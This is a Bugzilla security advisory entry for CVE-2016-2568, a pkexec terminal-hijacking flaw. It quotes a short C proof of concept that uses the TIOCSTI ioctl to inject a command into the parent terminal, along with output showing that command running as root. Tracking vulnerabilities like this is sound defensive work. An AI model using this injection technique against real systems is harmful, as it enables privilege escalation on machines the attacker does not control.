Bugzilla – Bug 968375
VUL-0: CVE-2016-2568: polkit: pkexec tty hijacking via TIOCSTI ioctl
Last modified: 2020-06-29 06:23:55 UTC
rh#1300746: ----------- It was reported that when executing a program via "pkexec --user nonpriv program", the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. Original bug report (contains reproducer): https://bugzilla.redhat.com/show_bug.cgi?id=1299955 rh#1299955: ----------- When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag. $ cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } $ gcc test.c -o test $ id uid=1000(saken) gid=1000(saken) groups=1000(saken) # pkexec --user saken ./test ----> last command i type in id # id ----> did not type this uid=0(root) gid=0(root) groups=0(root) CVE-2016-2568 was assigned to this issue. References: https://bugzilla.redhat.com/show_bug.cgi?id=1300746 https://bugzilla.redhat.com/show_bug.cgi?id=1299955 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2568 http://seclists.org/oss-sec/2016/q1/443
bugbot adjusting priority
I added many comments to the bug 968674. Please follow the discussion there.